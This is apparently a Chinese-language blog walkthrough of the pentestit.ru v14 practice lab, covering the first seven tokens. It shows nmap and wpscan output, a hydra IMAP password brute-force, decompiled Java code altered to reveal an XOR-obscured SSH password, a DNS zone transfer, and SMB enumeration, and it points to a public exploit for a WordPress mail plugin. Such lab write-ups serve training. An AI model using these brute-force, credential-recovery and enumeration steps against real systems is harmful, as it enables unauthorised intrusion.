pentestit.ru-v14

Posted on 2020-08-26,6 min read

pentestit.ru-v14

配置hosts

vim /etc/hosts

信息搜集

访问site.test.lab

这里目前搜集到三个邮箱

Sales Department –  sidorov@test.lab 
PR Department – ivanov@test.lab
IT Department –  petrov@test.lab
Support: support@test.lab  //错误信息中的邮箱

扫下端口,开了80 143 8080

map -sV 192.168.101.14
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-26 14:48 CST
Nmap scan report for site.test.lab (192.168.101.14)
Host is up (0.69s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.18.0
143/tcp  open  imap    Dovecot imapd
8080/tcp open  http    nginx

访问http://site.test.lab:8080/mail/

然后看看http://192.168.101.15/ ,这个比较惨只开了80

渗透

0x00 第一个token

先对邮件8080端口进行测试,使用搜集到的邮箱地址进行测试,本来打算使用burp进行爆破发现存在token

所以这条路不通只能寄托于143端口,首先从技术支持的邮箱进行测试(一般为技术人员邮箱)

hydra -l support@test.lab -P MiniPwds.txt imap://192.168.101.14

拿到了support@test.lab发现了密码PASSWORD ,同时在邮箱里拿到第一个token值

0x01 第二个token

翻邮箱发现了vpn文件

并登录成功,通过翻邮件发现了client.jar包,反编译发现有172.16.20.2的ssh登录信息,但是密码是加密了,改一行代码把密码给咱输出出来

// 
// Decompiled by Procyon v0.5.36
// 

package lab.test.client;

import java.io.IOException;
import com.jcraft.jsch.JSchException;
import java.io.InputStream;
import com.jcraft.jsch.Channel;
import com.jcraft.jsch.Session;
import java.io.OutputStream;
import com.jcraft.jsch.ChannelExec;
import java.util.Properties;
import com.jcraft.jsch.JSch;

public class Main
{
    private static String sshHost;
    private static int sshPort;
    private static String sshLogin;
    private static String sshPass;
    
    public static void main(final String[] args) throws JSchException, IOException {
        final byte[] buf = Main.sshPass.getBytes();
        for (byte i = 0; i < buf.length; ++i) {
            buf[i] ^= i;
        }
        Main.sshPass = new String(buf);
        final JSch jSch = new JSch();
        final Session session = jSch.getSession(Main.sshLogin, Main.sshHost, Main.sshPort);
        
        session.setPassword(Main.sshPass);
        System.out.print(Main.sshPass); //这里加了一行输出密码
        final Properties config = new Properties();
        config.put("StrictHostKeyChecking", "no");
        session.setConfig(config);
        session.connect(30000);
        final Channel channel = session.openChannel("exec");
        ((ChannelExec)channel).setCommand("df -h |grep /dev/sda1");
        ((ChannelExec)channel).setErrStream(System.err);
        channel.connect();
        final InputStream in = channel.getInputStream();
        final byte[] tmp = new byte[1024];
        while (true) {
            if (in.available() > 0) {
                final int j = in.read(tmp, 0, 1024);
                if (j >= 0) {
                    System.out.print(new String(tmp, 0, j));
                    continue;
                }
            }
            if (channel.isClosed()) {
                if (in.available() > 0) {
                    continue;
                }
                break;
            }
        }
        System.exit(0);
    }
    
    static {
        Main.sshHost = "172.16.20.2";
        Main.sshPort = 22;
        Main.sshLogin = "dev";
        Main.sshPass = "L1(#@ru0euh0if"; //
    }
}

本人没学过Java,这里只能求群里大佬帮忙反编译和打包jar包,给我密码

拿到的密码为对应Java题的flag

0x02 第三个token

继续对这台机器文件搜索token

拿到一个token

0x03 第四个token

开始对site.test.lab进行测试,通过右键看源码得出使用了WordPress,这里使用wpscan进行测试

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://site.test.lab/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt

发现存在使用mail-masta v1.0,这里贴一个洞 https://www.exploit-db.com/exploits/40290

发现了token

0x04 第五个token

在vpn链接发现了路由信息,172.16.0.0/16和10.11.0.1/32

Wed Aug 26 16:30:22 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.13
Wed Aug 26 16:30:22 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.13

这里使用msf的scanner/portscan/tcp对172.16.0.0/16进行端口扫描,发现了一台开放80端口的机器

访问主机目录下token,发现了新的token值

0x05 第六个token

在上边那个还发现存在172.16.0.10开放53端口,使用dig查看下

dig @172.16.0.10 test.lab  axfr

发现里面包含一个token值

0x06 第七个token

对上个dns出现的ip进行扫描,这里我首先对里面存在的dc进行测试

发现存在开放445一类的smb,测试了ms17-010发现不存在

使用enum4linux -a 172.16.0.20 进行smb信息搜集发现了token

0x07 第八个token

下一篇: 工具汇总→